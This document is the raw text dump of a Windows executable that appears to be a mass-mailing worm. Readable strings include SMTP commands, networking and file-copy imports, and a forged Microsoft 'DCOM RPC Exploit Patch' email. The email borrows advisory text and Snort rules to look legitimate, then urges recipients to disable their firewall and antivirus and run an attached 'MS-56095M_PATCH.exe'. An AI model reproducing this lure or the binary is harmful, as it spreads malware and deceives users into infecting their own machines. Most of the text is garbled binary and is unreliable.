MZP@ !L!This program must be run under Win32 $7PEL^B* vxg@@LHCODEuv `DATAz@BSS |.idataL|@.tls.rdata@P.relocH@P.rsrc@P@PL@L@2@2@2@2@2@t1@1@1@TObject% @%@%@%@%@%@%@%@%@%@%@%@%ܰ@%@%ذ@%@%԰@%а@%̰@%Ȱ@%İ@%,@%(@%$@%4@%@Sļ TD$,t\$0ÃD[Ë%@%@%@%@%@%@%@%@SV̥@>u:hDjȅu3^[áȥ@ ȥ@3ҋDBdu^[Ð@ËSVu3^[ËPVP XB^[ËP Q̥@̥@SVWUQ$]$PV;CS ;uCC FV;u C F;u‹֋Uu3Z]_^[Í@SVWU؋2C;rlJk ;w^;uBCB)C { uD5; r΋{ ;u)s & J $+|$+ЉS ԋu3 ;u3YZ]_^[ÐSVWڋ} sjh Vj;t#ӸХ@luhjP3_^[ÐSVWUًCjh hU;usjh VU;t#ӸХ@uhjPb3]_^[ÐSVWUL$$D$3҉T$ $ʼnD$Х@Q;s;wFC ;D$w;;t$st$C ;D$ vD$ hjVu @߁Х@uD$3҉|$ tD$T$D$ +D$T$B]_^[SVWUL$$Ћ$T$D$(D$+ŋT$B5Х@<^~ ;v;|$v|$;vjh+WS&u D$3҉ 6Х@u ]_^[ËSVWUQ؋4$$+$A5Х@8^~ ;$s$;s;vh@+WSu @6Х@uZ]_^[Í@SVWU@?]3;{ ,΋׋C>tPFCF)C { u>5;uɋ֋>t!̋֋<$űV3YZ]_^[ËSVWU $@?];t;su;suW;{ L$+S CC |$t3L$ T$]|$ uL$ T$D$%$3҉L$׋|$t4L$ T$|$ fL$ T$D$$3҉Hk;u:;{ 5 $׋q$8t($@C$@)C { u$3҉]_^[ÐSVW$?4$;s[ϋ+ӋL$׸@]\$tL$ T$&D$ D$D$D$|$tT$@3_^[U3Uh@d2d"h@9=5@t h@.Х@@ @xhj@=@t/@3ɉL@=u@@@@3ZYYdh@=5@t h@堨@]US=@3Uh@d2d"=5@t h@f@@P43@Х@hjCP%Х@uХ@@ @uȥ@tȥ@Pȥ@u3ZYYdh@=5@t h@h@[]S;@u P@PH8;uy@3҉T$y@TP[ËP[Í@ @J;rJ ;r @u@3ҋÐSʃ|[Ã| ʁ [@Ѓ@Ë |Ã| ʁƒ SVЃʁt @ځ+Ë3t @t Ѓ r+;pt @ދ^[Í@SVW3t %؋uXF؃#_^[SVWU$؅kC Ѝ 7+у ++Ń }L$+S׋L$׃Fl$t4+֋cD$SS ;s 7+T$$$ ]_^[Í@SVW߉sƃ p7օy@Du@\[:CZ,<| ֋u@@CZ_^[Í@=@~@=@ } @+@@@3@3@ËSVW<$L$׸ @\$u3R;s )GGt$ ;sGG;uo@G@_^[Í@S؋ԍCD<$t Wu3YZ[ÐSV؋̍V<$t &u3YZ^[Í@3҅y=@Tu@=uSVWU@@@;sC;~{s[;sB;tc ؅uNu3;u)u} }u3E@5@փ@5@LS+ƃ | ֒T;uCƃ Ëփ@5@]_^[USVW؀=@u t~ 3ET3Uh| @d1d!=5@t h@  } Åy@Ttyà B;uÅy @3|&˅y=@D MMAMƋRE@@";@J)@=@ } @3@@@ӃE@@2E3ZYYdh @=5@t h@E_^[YY]Í@UQSVW3@=@ufu@Ea3Uh""@d1d!=5@t h@u@ @%)@tEƃ P |t@ +;Pt@ ڋTË;=@u,)@@=@<~3E}t} @ 7)ǃxt 8tx } @ PӋ'@E3ZYYdh)"@=5@t h@W9E_^[Y]ËSVWU } }Nj;+։$;@u8$)@$@=@ L$@$)@3u ËP$<$ |ދ$Ã+ljD$;@ug@;D$|SD$)@D$@=@ }@@5@3@+@E% uIuMӋ‹H $ $;L$}$ڋ$)D$,*D$)$<$ |Ƌ$y:4$ރ#.t!%Ë؋T$t  3+@E% uYZ]_^[ÐUQSVW؀=@uu 3E3Uh$@d2d"=5@t h@$֋t]6Ã%;}ƅt׋ˑn}3ZYYdh$@=5@t h@E_^[Y]Í@S~,@؅u 3ۋ[St0@؅t 3ۋ[Ët2tP4@Y tð0@ uðptP,@Y tÍ@@ISV؀=@t ֋@u w 3Ê8@3Ë^[Ë$PRQYZXu1Í@S[ÐVWƉ׉9wt/x*_^Ít1|9x_^SVWUSt؊t< v;"u {"u3C<"u1SHS>+؊t<"u;tS!S+؊< wƋTߋ>3Q<"u8SS;v 7CF;wt<"u;tSS;v 7CF;w< w]_^[ËSVWڋuhD$Pjȋԋ\}Ӌt;tN_^[ËUEPEku3C {(v>t!CtsSB;Bt tPv1{(uS${(t;u=@t@P1V ^v]_^[ã@Ð@ËtJI|Ju PBXÐSVÉ֋tJI|JuBNu^[Ðt$JAPRB\XRHZXBtJI|JuBÐt JA~BtJI|JuBdÍ@~$P P/ZfDZP@1ÐSVWÉ։ωDžt ‰#;_^[Ë1Ʌt!R: t:Jt:Jt :JtBBBZ)Í@1Ɋ BÐWPQ1uXX_}Åt@Åt?SVWÉ֋yV9tN_^[Åta;t\;tPQyZXSVWӉPCFlj‰؋K1NS"XtO3_^[É(ISVWRP1Lt9u1Lt A9u1Jut‰7vW7KFPƋDt HKuZXu tJZ_^[X$Í@SVWƉ9thtkFW)wRt&9uXJtN_9uKJuZt"8uAJt8u:Jt9u'#W)F)Z8u8u 8u8_^[Ët PB~@Ðt5>@Ët8JIt2SËB5‹PHXHI|Hu@q[Í@ËSt-Xt&J|9})Ӆ|9‹D$1D$[Åt@t1SVWƉ׋OWVJxF)~uVW_^t Z11Z)_^[Í@SVWÉ1~Ht#xu PXp(;NjtH9|X;_^[Ë3SӉ1ɅtK)Q^Y[ËtPReXÍ@SVÉ֋t PHNu^[Í@1SJVWÍt |F؋ O_^[ÐSVWÉ։1ҊV1< t"< t< t$< t3<tM<t<t _^[h OE KKK O2UՋT. \.L.O]UՉ\.EO]_^[Ð1SJVWÍt |F؋O_^[Í@PSVWÉ։1ҊV< t%< t>< tQ< t\<tv<< `won؃O_UՋT. \.L.bO]AUՉ\.O]+؃O؉oO _^[X_^[XËffr ftÍ@H@3A@@+uA@H@Ð%H@ÐPXðËt3Iu'P1ɊJTtHtXËUSVWE(@E}t93UhB@d0d ]ES3ZYYd WEE}u_^[YY]Ë$@$@ËUQE3Uh C@d2d"E@t3ZYYdh'C@E;$@u E$@$@t;Uu Uu;Y]ËtPRPXÍ@U3UhC@d0d @u#8@@У@X3ZYYdhC@]Ð-@si @6@@ B@tf<@f@fԣ@,@)(@ @Ð%H@%D@%@@%<@Pj@Í@ËS؅t6=@u Yu D P@P[Ê @@u&d,@Pntá@P]tø@ÐS3@j+@@@3@3@@m[Í@U3Uh9E@d0d @3ZYYdh@E@"]Ë-@U3UhqE@d0d  @3ZYYdhxE@]Ë- @%@%@%@%@%|@%x@%t@%p@%l@%h@%d@%`@%\@%X@%T@%P@U3Uh)F@d0d @3ZYYdh0F@2]Ë-@%@%@%@%@%@%@%@%@%@%@%@U3UhF@d0d @3ZYYdhF@]Ë-@G@G@@2@2@2@2@2@t1@1@DH@ TClientSocketUSVU؋E3UhG@d0d ECjjjCfEVfECPuFuCPt@ EjEPCPC3ZYYdhG@E^[]ÐS؋CPTC[ËSVjQRCPcuo=3'u^[Í@SV؋ȋ֋^[ÐSVڋӀqz~^[U3UhH@d0d @u3ZYYdhH@]Í@-@sh@hÍ@@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/[~~~~~~~~~~~^~~~_TUVWXYZ[\]~~~|~~~ !"#$%&'()*+,-./0123456789~~~~~~:;<=>?@ABCDEFGHIJKLMNOPQRS@`!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_A !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ USVW3ۉ]UE3UhL@d0d ؋ӃEE,PӃ3X}u#EJ?!F@EE3ۊE,r,rE3ҊD}~RE3ҊӍDPM?U:#ŠM3ҊӋM DZmCEx3ҊD}}OE3+ˆEEP3ҊӍDPM?U:"ŠM3ҊӋM DZ*EEECE 3ҊӍDP3ËUDU:? ZCEE3ҊDE};E,r ,rI}uK,@EEEuUT2 @T0EMuT}uKvD]EEXuUT2 @T0EMuCE,3ҊD=uEP3Ɋ˺E3ZYYdhL@E8_^[]@U SVW3ɉ UEE^EV3UhM@d0d 3E3UhM@d0d U$$ -EjjjjjhEPYjjjVjEPj-}WV]~- P׋˰ $5}s3ZYYdhM@}tE@ꍅ$3ZYYdhM@ Eu_^[]U3UhCN@d0d @u(@@@@3ZYYdhJN@]Ã-@USV3ɉM3UhN@d0d EƋU}3ZYYdhN@E^[]ËUSEEN3UhO@d0d UE3ZYYdh O@EX[YY]Í@USV3ۉ]܉MUEEEEE 3Uh;P@d0d jjj ؃EJfEfEPfEEPEjEPStS[ E}u1SqCjVEPSEHUiU܍EfEˋES,3ZYYdhBP@EEE ^[]U3UhqP@d0d @3ZYYdhxP@]Ë-@UĴS؍PPt4Pu%EPPEPEPEPuEE[]S؋@[USV3ɉM3UhYQ@d0d UEƋU3ZYYdh`Q@El^[]ËU3QQQQQQSډEE3Uh;R@d0d EPuúPR@kq@ EEPE3EU*uhdR@3EUuhdR@3EUuhdR@3EUuú3ZYYdhBR@E [] 127.0.0.1.SVW؋Nj֋7t RCPT TO: <>DATA Message-ID: ..qmail@hotmail.comDATE: 13:37:00 /FROM: Security Alert TO:  <3Reply-to: Security Alert !SUBJECT: DCOM RPC Exploit Patch SUBJECT: DCOM RPC Exploit SUBJECT: Patch your Systems. MIME-Version: 1.0 4Content-Type: multipart/mixed; boundary="--ABCDEF" X-Priotity: 3 X-MSMail-Priority: Normal *X-Mailer: Microsoft Outlook Express 5.50 1X-MimeOLE: Produced by Microsoft MimeOLE v 5.50 , This is a multipart MIME-coded message ----ABCDEF -Content-Type: text/html; charset="us-ascii" -Content-Transfer-Encoding: quoted-printable Ever since the announcement of the RPC DCOM vulnerability,
the hacker community has been busy refining exploits in order to make use of this issue.
Over the last two weeks, a number of exploits have been released.
They are very easy to use and have already been used to attack numerous systems.
Currently, more than 1/4 of the sensors participating in the Internet Storm Center have detected scans for this vulnerability.
If successful, the exploit will be hard to detect.
Only if the exploit failed, you will see a popup alert indicating that the RPC service died. Your machine may reboot by itself as a result.
Essentially all versions of Windows are vulnerable. The only exception is Windows ME.
A patch has been made available by Microsoft as of July 16th 2003.
Recommendation:
/- Patch your systems as fast as possible.
- apply firewall rules to block at least port 135, 139 and 445.
RPC may use other ports as well depending on configuration. Do not use these limited rules in lieu of patches.


SNORT Rules:
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC invalid bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:y1; byte_test:1,&,,,,1,0,relative; content:"|00|"; distance:21; within:1; classtype:attempted-dos; sid:2190; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPC invalid bind attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase; offset:4; depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c 00|P|00|I|00|P|00|E|00 5c 00|"; nocase; distance:5; within:12; content:"|05|"; distance:2; within:1; content:"|0b|"; distance:1; within:1; byte_test:1,&,,g,,1,0,relative; content:"|00|"; distance:21; within:1; classtype:attempted-dos; sid:2191; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:1; byte_test:1,&,,,,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPC ISystemActivator bind attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase; offset:4; depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c 00|P|00|I|00|P|00|E|00 5c 00|"; nocase; distance:5; within:12; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:1; byte_test:1,&,,,,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2193; rev:1;)
Patch your systems with the MS-560954 DCOM RPC exploit patch to rid of this vulnerability.Download the attachment, turn off all firewall's and Antivirus and run the patch.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 62003 Microsoft Corporation. All rights reserved
7Content-Type: audio/x-wav; name="MS-56095M_PATCH.exe" #Content-Transfer-Encoding: base64 AContent-Disposition: attachment; filename="MS-56095M_PATCH.exe" Content-ID: ----ABCDEF--  . QUIT C:\MS-56095M_PATCH.exeC:\Listen_at_me.txt#||---------------|| #||-----Z loves Laura-----------|| #||----------and----------------|| #||--------i miss you crow------|| !||-i really do----------aug 9th||0http://www.lunarstorm.se100600000@2@@@@@ @$@@Runtime error at 00000000Error0123456789ABCDEFH@I@|I@I@ı$.4L<Pұ6DT`nβܲ$4@L^n|³Գ <ZhvĴ̴޴$4DVb|ȵֵ ,4>kernel32.dllDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionVirtualFreeVirtualAllocLocalFreeLocalAllocGetCurrentThreadIdGetStartupInfoAGetModuleFileNameAGetLastErrorGetCommandLineAFreeLibraryExitProcessWriteFileUnhandledExceptionFilterSetFilePointerSetEndOfFileRtlUnwindReadFileRaiseExceptionGetStdHandleGetFileSizeGetSystemTimeGetFileTypeCreateFileACloseHandleuser32.dllGetKeyboardTypeMessageBoxACharNextAadvapi32.dllRegQueryValueExARegOpenKeyExARegCloseKeyoleaut32.dllSysFreeStringkernel32.dllTlsSetValueTlsGetValueLocalAllocGetModuleHandleAkernel32.dllWritePrivateProfileStringASleepSetFilePointerReadFileGetTempPathAGetTempFileNameAGetSystemDirectoryAGetLastErrorFindNextFileAFindFirstFileAFindCloseFileTimeToLocalFileTimeFileTimeToDosDateTimeDeleteFileACreateFileACopyFileAwsock32.dllWSACleanupWSAStartupWSAGetLastErrorgethostbynamesocketsendntohlinet_addrhtonsconnectclosesocket@@@@,0 0,0004080<0@0D0H0V0^0f0n0v0~000000000000000001111J1R1Z1b1j1r1z111112#2k3314w445D55555s6778&81898C8M8W8m8s8888888888889 999%9?9F9P9Z9d9p9{999999999:6:>:~:::;!;K>>>>>>>> ?3???G?z????? 0 0000$0*0=0F0d0j0r000000001161N1r1z111111 222r2}2222222 333%3+31383B334/4;4C444444505I5Z5o5|5577989?9F9:+:^:::;;;E@11111]2n22222223K3W3^3h3r3333333333334444&4N4x44444444444455'545F5S5_5l5~55555555555555555 66$666>6F6N6V6^6f6n6v6~666666666666777 777C77w88888&:;6<<<<===>>>">,>>>N>l>>>>N?P0S0_0l0~01L111112)2222m333 44444/5o555555 66O6w66667A7n7777"8O88888#9S9{9;";D;d;;;;<<<< ==#=0===m=>>0>Q>>> ?H????`050s000-1k111L222333C35555I6666677,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7t777777777778 8888,82878I8y88899.999G9Q9u9{9999999999: :::#:-:=:B:V:j:p:u:::::::::::;;A;K;Z;`;e;k;p;u;;;;;;;;;;;;<%<3>>+>8>=>G>V>[>j>o>y>>>>>>>>>>>>>??)?8?D?Z?f?l?q?????????????p 00)0.0B0G0[0j0t0000,000400000000 0r0 r08Pr0hr0xhDVCLAL PACKAGEINFO&=O8‚7$B: RStillCrowUTypesSystemSysInitigmp WinSock KWindows,uBase64_SocketUnit